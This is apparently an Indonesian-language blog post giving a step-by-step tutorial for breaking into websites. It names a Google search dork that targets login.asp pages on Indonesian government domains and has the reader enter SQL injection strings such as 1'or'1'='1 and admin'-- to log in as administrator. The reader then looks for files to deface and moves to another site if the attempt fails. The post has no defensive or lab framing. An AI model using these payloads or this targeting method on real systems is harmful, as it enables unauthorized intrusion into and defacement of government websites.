Langsung aja 1) Buka Uncle Google.com
2) Cari dork ---> site:go.id login.asp <--- Cth target www.target.com/login.asp
3) Username = Admin
Password = 'or"='
OR
Username = 'or"='
Password = 'or"='
4) Jika berasil seludup masuk sebagai admin, buka satu persatu link file disana.
5) Cari file yg boleh kita ubah/deface
6) Kalau tidak berasil cari target lain
Notes (Strings Password SQL) :-
---> 1'or'1'='1
---> 'or"='
---> 0'or'0'='0
---> admin'--
---> ' or 0=0 --
---> " or 0=0 --
---> or 0=0 --
---> ' or 0=0 #
Tidak ada komentar:
Posting Komentar